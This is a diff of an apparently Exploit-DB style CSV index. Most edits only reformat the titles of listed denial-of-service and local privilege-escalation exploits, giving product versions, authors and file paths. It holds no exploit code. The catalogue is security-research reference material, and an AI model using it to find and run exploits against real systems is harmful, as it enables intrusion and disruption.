dissect_btatt) SIGSEGV",2015-12-16,"Google Security Research",multiple,dos,0 +38997,platforms/multiple/dos/38997.txt,"Wireshark - file_read 'wtap_read_bytes_or_eof/mp2t_find_next_pcr' Stack Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0 +38998,platforms/multiple/dos/38998.txt,"Wireshark - memcpy 'get_value / dissect_btatt' SIGSEGV",2015-12-16,"Google Security Research",multiple,dos,0 38999,platforms/multiple/dos/38999.txt,"Wireshark - dissect_nbap_MACdPDU_Size SIGSEGV",2015-12-16,"Google Security Research",multiple,dos,0 39000,platforms/multiple/dos/39000.txt,"Wireshark - my_dgt_tbcd_unpack Static Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0 39001,platforms/multiple/dos/39001.txt,"Wireshark - ascend_seek Static Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos,0 -39002,platforms/multiple/dos/39002.txt,"Wireshark - addresses_equal (dissect_rsvp_common) Use-After-Free",2015-12-16,"Google Security Research",multiple,dos,0 +39002,platforms/multiple/dos/39002.txt,"Wireshark - addresses_equal 'dissect_rsvp_common' Use-After-Free",2015-12-16,"Google Security Research",multiple,dos,0 39003,platforms/multiple/dos/39003.txt,"Wireshark - dissect_diameter_base_framed_ipv6_prefix Stack Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0 39004,platforms/multiple/dos/39004.txt,"Wireshark - find_signature Stack Based Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos,0 39005,platforms/multiple/dos/39005.txt,"Wireshark - AirPDcapPacketProcess Stack Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0 @@ -4960,12 +4960,12 @@ id,file,description,date,author,platform,type,port 39375,platforms/osx/dos/39375.c,"Apple Mac OSX Kernel - IOAccelDisplayPipeUserClient2 Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 39308,platforms/linux/dos/39308.c,"Linux Kernel 3.x/4.x - prima WLAN Driver Heap Overflow",2016-01-25,"Shawn the R0ck",linux,dos,0 39315,platforms/hardware/dos/39315.pl,"Aztech Routers - '/cgi-bin/AZ_Retrain.cgi' Denial of Service",2014-09-15,"Federick Joe P Fajardo",hardware,dos,0 -39321,platforms/multiple/dos/39321.txt,"pdfium - opj_jp2_apply_pclr (libopenjpeg) Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 -39322,platforms/multiple/dos/39322.txt,"pdfium - opj_j2k_read_mcc (libopenjpeg) Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 -39323,platforms/multiple/dos/39323.txt,"Wireshark - iseries_check_file_type Stack Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 +39321,platforms/multiple/dos/39321.txt,"pdfium - opj_jp2_apply_pclr 'libopenjpeg' Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 +39322,platforms/multiple/dos/39322.txt,"pdfium - opj_j2k_read_mcc 'libopenjpeg' Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 +39323,platforms/multiple/dos/39323.txt,"Wireshark - 'iseries_check_file_type' Stack Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 39324,platforms/multiple/dos/39324.txt,"Wireshark - dissect_nhdr_extopt Stack Based Buffer Overflow",2016-01-26,"Google Security Research",multiple,dos,0 39325,platforms/multiple/dos/39325.txt,"Wireshark - hiqnet_display_data Static Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 -39326,platforms/multiple/dos/39326.txt,"Wireshark - nettrace_3gpp_32_423_file_open Stack Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 +39326,platforms/multiple/dos/39326.txt,"Wireshark - 'nettrace_3gpp_32_423_file_open' Stack Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 39327,platforms/multiple/dos/39327.txt,"Wireshark - dissect_ber_constrained_bitstring Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 39329,platforms/windows/dos/39329.py,"InfraRecorder - '.m3u' File Buffer Overflow",2014-05-25,"Osanda Malith",windows,dos,0 39330,platforms/windows/dos/39330.txt,"Foxit Reader 7.2.8.1124 - '.PDF' Parsing Memory Corruption",2016-01-26,"Francis Provencher",windows,dos,0 @@ -4997,11 +4997,11 @@ id,file,description,date,author,platform,type,port 39397,platforms/windows/dos/39397.txt,"WPS Office < 2016 - '.ppt' drawingContainer Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0 39398,platforms/windows/dos/39398.txt,"WPS Office < 2016 - '.xls' Heap Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0 39400,platforms/windows/dos/39400.pl,"Toshiba Viewer v2 p3console - Local Denial of Service",2016-02-02,JaMbA,windows,dos,0 -39401,platforms/multiple/dos/39401.txt,"pdfium - opj_t2_read_packet_header (libopenjpeg) Heap Use-After-Free",2016-02-02,"Google Security Research",multiple,dos,0 +39401,platforms/multiple/dos/39401.txt,"pdfium - opj_t2_read_packet_header 'libopenjpeg' Heap Use-After-Free",2016-02-02,"Google Security Research",multiple,dos,0 39403,platforms/windows/dos/39403.py,"Baumer VeriSens Application Suite 2.6.2 - Buffer Overflow",2016-02-03,LiquidWorm,windows,dos,0 39406,platforms/linux/dos/39406.py,"yTree 1.94-1.1 - Local Buffer Overflow",2016-02-03,"Juan Sacco",linux,dos,0 39424,platforms/android/dos/39424.txt,"Samsung Galaxy S6 - libQjpeg je_free Crash",2016-02-08,"Google Security Research",android,dos,0 -39425,platforms/android/dos/39425.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption (MdConvertLine)",2016-02-08,"Google Security Research",android,dos,0 +39425,platforms/android/dos/39425.txt,"Samsung Galaxy S6 - 'android.media.process' 'MdConvertLine' Face Recognition Memory Corruption",2016-02-08,"Google Security Research",android,dos,0 39426,platforms/multiple/dos/39426.txt,"Adobe Flash - Processing AVC Causes Stack Corruption",2016-02-08,"Google Security Research",multiple,dos,0 39428,platforms/windows/dos/39428.txt,"PotPlayer 1.6.5x - '.mp3' Crash (PoC)",2016-02-09,"Shantanu Khandelwal",windows,dos,0 39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0 @@ -5048,7 +5048,7 @@ id,file,description,date,author,platform,type,port 39533,platforms/windows/dos/39533.txt,"Adobe Digital Editions 4.5.0 - '.pdf' Critical Memory Corruption",2016-03-09,"Pier-Luc Maltais",windows,dos,0 39537,platforms/linux/dos/39537.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'digi_acceleport' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 39538,platforms/linux/dos/39538.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'Wacom' Multiple Nullpointer Dereferences",2016-03-09,"OpenSource Security",linux,dos,0 -39539,platforms/linux/dos/39539.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor (treo_attach) Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 +39539,platforms/linux/dos/39539.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor 'treo_attach' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 39540,platforms/linux/dos/39540.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor clie_5_attach Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 39542,platforms/linux/dos/39542.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'cypress_m8' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 39541,platforms/linux/dos/39541.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'mct_u232' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 @@ -5064,7 +5064,7 @@ id,file,description,date,author,platform,type,port 39560,platforms/windows/dos/39560.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39561,platforms/windows/dos/39561.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39562,platforms/windows/dos/39562.html,"Microsoft Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0 -39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0 +39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX 'sourceFile' Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0 39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 (x64) - 'amd64_set_ldt' Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0 39600,platforms/windows/dos/39600.txt,"Avira - Heap Underflow Parsing PE Section Headers",2016-03-23,"Google Security Research",windows,dos,0 39601,platforms/windows/dos/39601.txt,"Comodo - PackMan Unpacker Insufficient Parameter Validation",2016-03-23,"Google Security Research",windows,dos,0 @@ -5085,9 +5085,9 @@ id,file,description,date,author,platform,type,port 39616,platforms/osx/dos/39616.c,"Apple Mac OSX Kernel - Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver",2016-03-23,"Google Security Research",osx,dos,0 39627,platforms/windows/dos/39627.py,"TallSoft SNMP/TFTP Server 1.0.0 - Denial of Service",2016-03-28,"Charley Celice",windows,dos,69 39629,platforms/android/dos/39629.txt,"Android One - mt_wifi IOCTL_GET_STRUCT Privilege Escalation",2016-03-28,"Google Security Research",android,dos,0 -39633,platforms/multiple/dos/39633.txt,"Apple QuickTime < 7.7.79.80.95 - FPX File Parsing Memory Corruption 1",2016-03-30,"Francis Provencher",multiple,dos,0 -39634,platforms/multiple/dos/39634.txt,"Apple QuickTime < 7.7.79.80.95 - FPX File Parsing Memory Corruption 2",2016-03-30,"Francis Provencher",multiple,dos,0 -39635,platforms/multiple/dos/39635.txt,"Apple QuickTime < 7.7.79.80.95 - PSD File Parsing Memory Corruption",2016-03-30,"Francis Provencher",multiple,dos,0 +39633,platforms/multiple/dos/39633.txt,"Apple QuickTime < 7.7.79.80.95 - '.FPX' Parsing Memory Corruption (1)",2016-03-30,"Francis Provencher",multiple,dos,0 +39634,platforms/multiple/dos/39634.txt,"Apple QuickTime < 7.7.79.80.95 - '.FPX' Parsing Memory Corruption (2)",2016-03-30,"Francis Provencher",multiple,dos,0 +39635,platforms/multiple/dos/39635.txt,"Apple QuickTime < 7.7.79.80.95 - '.PSD' Parsing Memory Corruption",2016-03-30,"Francis Provencher",multiple,dos,0 39638,platforms/linux/dos/39638.txt,"Kamailio 4.3.4 - Heap Based Buffer Overflow",2016-03-30,"Stelios Tsampas",linux,dos,0 39644,platforms/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap Based Out-of-Bounds Read",2016-03-31,"Google Security Research",multiple,dos,0 39647,platforms/windows/dos/39647.txt,"Microsoft Windows Kernel - Bitmap Use-After-Free",2016-04-01,"Nils Sommer",windows,dos,0 @@ -5139,7 +5139,7 @@ id,file,description,date,author,platform,type,port 39824,platforms/multiple/dos/39824.txt,"Adobe Flash - JXR Processing Out-of-Bounds Read",2016-05-17,"Google Security Research",multiple,dos,0 39825,platforms/multiple/dos/39825.txt,"Adobe Flash - Out-of-Bounds Read when Placing Object",2016-05-17,"Google Security Research",multiple,dos,0 39826,platforms/multiple/dos/39826.txt,"Adobe Flash - Overflow in Processing Raw 565 Textures",2016-05-17,"Google Security Research",multiple,dos,0 -39827,platforms/multiple/dos/39827.txt,"Adobe Flash - Heap Overflow in ATF Processing (Image Reading)",2016-05-17,"Google Security Research",multiple,dos,0 +39827,platforms/multiple/dos/39827.txt,"Adobe Flash - Heap Overflow in ATF Processing Image Reading",2016-05-17,"Google Security Research",multiple,dos,0 39828,platforms/multiple/dos/39828.txt,"Adobe Flash - '.MP4' Stack Corruption",2016-05-17,"Google Security Research",multiple,dos,0 39829,platforms/multiple/dos/39829.txt,"Adobe Flash - Type Confusion in FileReference Constructor",2016-05-17,"Google Security Research",multiple,dos,0 39830,platforms/multiple/dos/39830.txt,"Adobe Flash - addProperty Use-After-Free",2016-05-17,"Google Security Research",multiple,dos,0 @@ -5327,7 +5327,7 @@ id,file,description,date,author,platform,type,port 40899,platforms/linux/dos/40899.py,"OpenSSL 1.1.0a/1.1.0b - Denial of Service",2016-12-11,Silverfox,linux,dos,0 40905,platforms/windows/dos/40905.py,"Serva 3.0.0 - HTTP Server Denial of Service",2016-12-12,LiquidWorm,windows,dos,0 40906,platforms/ios/dos/40906.txt,"iOS 10.1.x - Certificate File Memory Corruption",2016-12-12,"Maksymilian Arciemowicz",ios,dos,0 -40909,platforms/linux/dos/40909.py,"Apache 2.4.23 (mod_http2) - Denial of Service",2016-12-12,"Jungun Baek",linux,dos,0 +40909,platforms/linux/dos/40909.py,"Apache 2.4.23 mod_http2 - Denial of Service",2016-12-12,"Jungun Baek",linux,dos,0 40910,platforms/hardware/dos/40910.txt,"TP-LINK TD-W8151N - Denial of Service",2016-12-13,"Persian Hack Team",hardware,dos,0 40914,platforms/android/dos/40914.java,"Samsung Devices KNOX Extensions - OTP TrustZone Trustlet Stack Buffer Overflow",2016-12-13,"Google Security Research",android,dos,0 40915,platforms/windows/dos/40915.txt,"Adobe Animate 15.2.1.95 - Memory Corruption",2016-12-14,hyp3rlinx,windows,dos,0 @@ -5683,8 +5683,8 @@ id,file,description,date,author,platform,type,port 42741,platforms/windows/dos/42741.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetGlyphOutline' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42742,platforms/windows/dos/42742.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetPhysicalMonitorDescription' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42743,platforms/windows/dos/42743.cpp,"Microsoft Windows Kernel - 'nt!NtSetIoCompletion / nt!NtRemoveIoCompletion' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 -42744,platforms/windows/dos/42744.txt,"Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)",2017-09-18,"Google Security Research",windows,dos,0 -42746,platforms/windows/dos/42746.txt,"Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow)",2017-09-18,"Google Security Research",windows,dos,0 +42744,platforms/windows/dos/42744.txt,"Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table 'win32k!bGeneratePath'",2017-09-18,"Google Security Research",windows,dos,0 +42746,platforms/windows/dos/42746.txt,"Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table 'win32k!fsc_CalcGrayRow'",2017-09-18,"Google Security Research",windows,dos,0 42748,platforms/windows/dos/42748.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiEngCreatePalette' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42749,platforms/windows/dos/42749.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42758,platforms/windows/dos/42758.txt,"Microsoft Edge 38.14393.1066.0 - Memory Corruption with Partial Page Loading",2017-09-19,"Google Security Research",windows,dos,0 @@ -5718,6 +5718,7 @@ id,file,description,date,author,platform,type,port 43000,platforms/windows/dos/43000.js,"Microsoft Edge Chakra JIT - 'RegexHelper::StringReplace' Must Call the Callback Function with Updating ImplicitCallFlags",2017-10-17,"Google Security Research",windows,dos,0 43001,platforms/windows/dos/43001.cpp,"Microsoft Windows - 'nt!NtQueryObject (ObjectNameInformation)' Kernel Pool Memory Disclosure",2017-10-17,"Google Security Research",windows,dos,0 43010,platforms/linux/dos/43010.c,"Linux Kernel - 'AF_PACKET' Use-After-Free",2017-10-17,SecuriTeam,linux,dos,0 +43107,platforms/ios/dos/43107.py,"WhatsApp 2.17.52 - Memory Corruption",2017-11-01,"Juan Sacco",ios,dos,0 43014,platforms/linux/dos/43014.txt,"Xen - Unbounded Recursion in Pagetable De-typing",2017-10-18,"Google Security Research",linux,dos,0 43020,platforms/multiple/dos/43020.txt,"Mozilla Firefox < 55 - Denial of Service",2017-10-20,"Amit Sangra",multiple,dos,0 43026,platforms/windows/dos/43026.py,"ArGoSoft Mini Mail Server 1.0.0.2 - Denial of Service",2017-10-21,"Berk Cem Göksel",windows,dos,0 @@ -5732,7 +5733,7 @@ id,file,description,date,author,platform,type,port 31,platforms/linux/local/31.pl,"CDRTools CDRecord 2.0 (Mandrake / Slackware) - Privilege Escalation",2003-05-14,anonymous,linux,local,0 32,platforms/windows/local/32.c,"Microsoft Windows XP - 'explorer.exe' Buffer Overflow",2003-05-21,einstein,windows,local,0 40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 /usr/mail - Local Exploit",2003-06-10,anonymous,linux,local,0 -52,platforms/windows/local/52.asm,"ICQ Pro 2003a - Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0 +52,platforms/windows/local/52.asm,"ICQ Pro 2003a - 'ca1-icq.asm' Password Bypass Exploit",2003-07-09,"Caua Moura Prado",windows,local,0 71,platforms/linux/local/71.c,"XGalaga 2.0.34 (RedHat 9.0) - Local Game Exploit",2003-07-31,c0wboy,linux,local,0 72,platforms/linux/local/72.c,"xtokkaetama 1.0b (RedHat 9.0) - Local Game Exploit",2003-08-01,brahma,linux,local,0 75,platforms/linux/local/75.c,"man-db 2.4.1 - 'open_cat_stream()' Local uid=man Exploit",2003-08-06,vade79,linux,local,0 @@ -5740,7 +5741,7 @@ id,file,description,date,author,platform,type,port 91,platforms/linux/local/91.c,"Stunnel 3.24/4.00 - Daemon Hijacking (PoC)",2003-09-05,"Steve Grubb",linux,local,0 93,platforms/linux/local/93.c,"RealPlayer 9 *nix - Privilege Escalation",2003-09-09,"Jon Hart",linux,local,0 104,platforms/linux/local/104.c,"hztty 2.0 (RedHat 9.0) - Privilege Escalation",2003-09-21,c0wboy,linux,local,0 -106,platforms/linux/local/106.c,"IBM DB2 - Universal Database 7.2 (db2licm) Local Exploit",2003-09-27,"Juan Escriba",linux,local,0 +106,platforms/linux/local/106.c,"IBM DB2 - Universal Database 7.2 'db2licm' Local Exploit",2003-09-27,"Juan Escriba",linux,local,0 114,platforms/solaris/local/114.c,"Solaris Runtime Linker (SPARC) - 'ld.so.1' Buffer Overflow",2003-10-27,osker178,solaris,local,0 118,platforms/bsd/local/118.c,"OpenBSD - 'ibcs2_exec' Kernel Local Exploit",2003-11-07,"Scott Bartram",bsd,local,0 120,platforms/linux/local/120.c,"TerminatorX 3.81 - Stack Overflow Privilege Escalation",2003-11-13,Li0n7,linux,local,0 @@ -5752,7 +5753,7 @@ id,file,description,date,author,platform,type,port 140,platforms/linux/local/140.c,"XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game Exploit",2004-01-02,c0wboy,linux,local,0 141,platforms/linux/local/141.c,"Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1)",2004-01-06,"Christophe Devine",linux,local,0 142,platforms/linux/local/142.c,"Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2)",2004-01-07,"Christophe Devine",linux,local,0 -144,platforms/linux/local/144.c,"SuSE Linux 9.0 - YaST config Skribt Local Exploit",2004-01-15,l0om,linux,local,0 +144,platforms/linux/local/144.c,"SuSE Linux 9.0 - YaST Configuration Skribt Local Exploit",2004-01-15,l0om,linux,local,0 145,platforms/linux/local/145.c,"Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation",2004-01-15,"Paul Starzetz",linux,local,0 152,platforms/linux/local/152.c,"rsync 2.5.7 - Stack Overflow Privilege Escalation",2004-02-13,"Abhisek Datta",linux,local,0 154,platforms/linux/local/154.c,"Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator (PoC)",2004-02-18,"Christophe Devine",linux,local,0 @@ -5774,13 +5775,13 @@ id,file,description,date,author,platform,type,port 206,platforms/linux/local/206.c,"dump 0.4b15 (RedHat 6.2) - Exploit",2000-11-29,mat,linux,local,0 207,platforms/bsd/local/207.c,"BSDi 3.0 inc - Buffer Overflow Privilege Escalation",2000-11-30,vade79,bsd,local,0 209,platforms/linux/local/209.c,"GLIBC - '/bin/su' Privilege Escalation",2000-11-30,localcore,linux,local,0 -210,platforms/solaris/local/210.c,"Solaris locale - Format Strings (noexec stack) Exploit",2000-11-30,warning3,solaris,local,0 +210,platforms/solaris/local/210.c,"Solaris locale - Format Strings 'noexec stack' Exploit",2000-11-30,warning3,solaris,local,0 215,platforms/linux/local/215.c,"GLIBC locale - bug mount Exploit",2000-12-02,sk8,linux,local,0 216,platforms/linux/local/216.c,"dislocate 1.3 - Local i386 Exploit",2000-12-02,"Michel Kaempf",linux,local,0 -217,platforms/linux/local/217.c,"UUCP Exploit - File Creation/Overwriting (Symlinks) Exploit",2000-12-04,t--zen,linux,local,0 +217,platforms/linux/local/217.c,"UUCP Exploit - File Creation/Overwriting Symlinks Exploit",2000-12-04,t--zen,linux,local,0 218,platforms/linux/local/218.c,"expect (/usr/bin/expect) - Buffer Overflow",2000-12-04,isox,linux,local,0 -219,platforms/linux/local/219.c,"GnomeHack - Local Buffer Overflow (gid=games)",2000-12-04,"Cody Tubbs",linux,local,0 -221,platforms/linux/local/221.c,"Kwintv - Local Buffer Overflow (gid=video(33))",2000-12-06,"Cody Tubbs",linux,local,0 +219,platforms/linux/local/219.c,"GnomeHack - Local Buffer Overflow",2000-12-04,"Cody Tubbs",linux,local,0 +221,platforms/linux/local/221.c,"Kwintv - Local Buffer Overflow",2000-12-06,"Cody Tubbs",linux,local,0 222,platforms/linux/local/222.c,"gnome_segv - Local Buffer Overflow",2000-12-06,"Cody Tubbs",linux,local,0 229,platforms/linux/local/229.c,"xsoldier 0.96 (RedHat 6.2) - Exploit",2000-12-15,zorgon,linux,local,0 231,platforms/linux/local/231.sh,"Pine (Local Message Grabber) - Exploit",2000-12-15,mat,linux,local,0 @@ -5790,7 +5791,7 @@ id,file,description,date,author,platform,type,port 249,platforms/linux/local/249.c,"GLIBC locale - Format Strings Exploit",2003-01-15,logikal,linux,local,0 250,platforms/solaris/local/250.c,"Solaris 7/8-beta - ARP Local Overflow",2001-01-15,ahmed,solaris,local,0 252,platforms/linux/local/252.pl,"Seyon 2.1 rev. 4b i586-Linux - Exploit",2001-01-15,teleh0r,linux,local,0 -255,platforms/linux/local/255.pl,"RedHat 6.1 man - Local Exploit (egid 15)",2001-01-19,teleh0r,linux,local,0 +255,platforms/linux/local/255.pl,"RedHat 6.1 man - 'egid 15' Local Exploit",2001-01-19,teleh0r,linux,local,0 256,platforms/solaris/local/256.c,"Solaris 2.6/2.7 - '/usr/bin/write' Local Overflow",2001-01-25,"Pablo Sor",solaris,local,0 257,platforms/linux/local/257.pl,"jaZip 0.32-2 - Local Buffer Overflow",2001-01-25,teleh0r,linux,local,0 258,platforms/linux/local/258.sh,"glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - Exploit",2001-01-25,krochos,linux,local,0 @@ -5816,15 +5817,15 @@ id,file,description,date,author,platform,type,port 322,platforms/linux/local/322.c,"Xt Library - Privilege Escalation",1996-08-24,"b0z0 bra1n",linux,local,0 325,platforms/linux/local/325.c,"BSD / Linux - 'lpr' Privilege Escalation",1996-10-25,"Vadim Kolontsov",linux,local,0 328,platforms/solaris/local/328.c,"Solaris 2.4 - '/bin/fdformat' Local Buffer Overflow",1997-03-23,"Cristian Schipor",solaris,local,0 -330,platforms/solaris/local/330.sh,"Solaris 2.5.1 lp / lpsched - Symlink Vulnerabilities",1997-05-03,"Chris Sheldon",solaris,local,0 +330,platforms/solaris/local/330.sh,"Solaris 2.5.1 lp / lpsched - Symlink Exploit",1997-05-03,"Chris Sheldon",solaris,local,0 331,platforms/linux/local/331.c,"LibXt - 'XtAppInitialize()' Overflow *xterm Exploit",1997-05-14,"Ming Zhang",linux,local,0 332,platforms/solaris/local/332.sh,"Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer Exploit",1997-05-19,"Joe Zbiciak",solaris,local,0 333,platforms/aix/local/333.c,"AIX 4.2 - '/usr/dt/bin/dtterm' Local Buffer Overflow",1997-05-27,"Georgi Guninski",aix,local,0 -334,platforms/irix/local/334.c,"SGI IRIX - Multiple Buffer Overflows (LsD)",1997-05-25,LSD-PLaNET,irix,local,0 +334,platforms/irix/local/334.c,"SGI IRIX - 'LsD' Multiple Buffer Overflows",1997-05-25,LSD-PLaNET,irix,local,0 335,platforms/aix/local/335.c,"AIX lquerylv - Buffer Overflow Privilege Escalation",1997-05-26,"Georgi Guninski",aix,local,0 336,platforms/irix/local/336.c,"SGI IRIX - '/bin/login' Local Buffer Overflow",1997-05-26,"David Hedley",irix,local,0 337,platforms/irix/local/337.c,"IRIX 5.3 - '/usr/sbin/iwsh' Buffer Overflow Privilege Escalation",1997-05-27,"David Hedley",irix,local,0 -338,platforms/solaris/local/338.c,"Solaris 5.5.1 X11R6.3 - xterm (-xrm) Privilege Escalation",1997-05-28,"David Hedley",solaris,local,0 +338,platforms/solaris/local/338.c,"Solaris 5.5.1 X11R6.3 - xterm '-xrm' Privilege Escalation",1997-05-28,"David Hedley",solaris,local,0 339,platforms/linux/local/339.c,"zgv - '$HOME' Buffer Overflow",1997-06-20,"BeastMaster V",linux,local,0 341,platforms/solaris/local/341.c,"Solaris 2.4 passwd / yppasswd / nispasswd - Overflows",1997-07-12,"Cristian Schipor",solaris,local,0 350,platforms/windows/local/350.c,"Microsoft Windows Server 2000 - Utility Manager Privilege Escalation (MS04-019)",2004-07-14,"Cesar Cerrudo",windows,local,0 @@ -5840,7 +5841,7 @@ id,file,description,date,author,platform,type,port 381,platforms/windows/local/381.c,"RhinoSoft Serv-U FTP Server 3.x < 5.x - Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local,0 388,platforms/windows/local/388.c,"OllyDbg 1.10 - Format String",2004-08-10,"Ahmet Cihan",windows,local,0 393,platforms/linux/local/393.c,"LibPNG 1.2.5 - 'png_jmpbuf()' Local Buffer Overflow",2004-08-13,anonymous,linux,local,0 -394,platforms/linux/local/394.c,"ProFTPd - 'ftpdctl pr_ctrls_connect' Exploit",2004-08-13,pi3,linux,local,0 +394,platforms/linux/local/394.c,"ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Exploit",2004-08-13,pi3,linux,local,0 395,platforms/windows/local/395.c,"AOL Instant Messenger AIM - 'Away' Message Local Exploit",2004-08-14,mandragore,windows,local,0 396,platforms/bsd/local/396.c,"OpenBSD - 'ftp' Exploit",2002-01-01,Teso,bsd,local,0 401,platforms/windows/local/401.c,"IPSwitch IMail Server 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0 @@ -5857,11 +5858,11 @@ id,file,description,date,author,platform,type,port 482,platforms/hp-ux/local/482.c,"HP-UX 11.0/11.11 - swxxx Privilege Escalation",2002-12-11,watercloud,hp-ux,local,0 558,platforms/windows/local/558.c,"WinRAR 1.0 - Local Buffer Overflow",2004-09-28,ATmaCA,windows,local,0 559,platforms/windows/local/559.c,"Zinf Audio Player 2.2.1 - Local Buffer Overflow",2004-09-28,Delikon,windows,local,0 -560,platforms/windows/local/560.txt,"GlobalScape - CuteFTP macros (.mcr) Local",2004-09-28,ATmaCA,windows,local,0 +560,platforms/windows/local/560.txt,"GlobalScape - CuteFTP macros '.mcr' Local",2004-09-28,ATmaCA,windows,local,0 579,platforms/bsd/local/579.sh,"BSD bmon 1.2.1_2 - Local Exploit",2004-10-16,"Idan Nahoum",bsd,local,0 586,platforms/linux/local/586.c,"BitchX 1.0c19 - Privilege Escalation",2004-10-20,Sha0,linux,local,0 587,platforms/linux/local/587.c,"Apache 1.3.31 mod_include - Local Buffer Overflow",2004-10-21,xCrZx,linux,local,0 -591,platforms/linux/local/591.c,"socat 1.4.0.2 - Local Format String (not setuid)",2004-10-23,CoKi,linux,local,0 +591,platforms/linux/local/591.c,"Socat 1.4.0.2 - Not SETUID Local Format String",2004-10-23,CoKi,linux,local,0 600,platforms/linux/local/600.c,"GD Graphics Library - Heap Overflow (PoC)",2004-10-26,anonymous,linux,local,0 601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp - Remote Buffer Overflow (PoC)",2004-10-26,infamous41md,linux,local,0 602,platforms/sco/local/602.c,"SCO OpenServer 5.0.7 - MMDF deliver Privilege Escalation",2004-10-26,"Ramon Valle",sco,local,0 @@ -5870,7 +5871,7 @@ id,file,description,date,author,platform,type,port 657,platforms/linux/local/657.c,"atari800 - Privilege Escalation",2004-11-25,pi3,linux,local,0 669,platforms/linux/local/669.c,"Aspell (word-list-compress) - Command Line Stack Overflow",2004-12-01,c0d3r,linux,local,0 680,platforms/osx/local/680.txt,"Apple Mac OSX Adobe Version Cue - Privilege Escalation (Bash)",2004-12-08,"Jonathan Bringhurst",osx,local,0 -684,platforms/linux/local/684.c,"TipxD 1.1.1 - Local Format String (not setuid)",2004-12-14,CoKi,linux,local,0 +684,platforms/linux/local/684.c,"TipxD 1.1.1 - Not SETUID Local Format 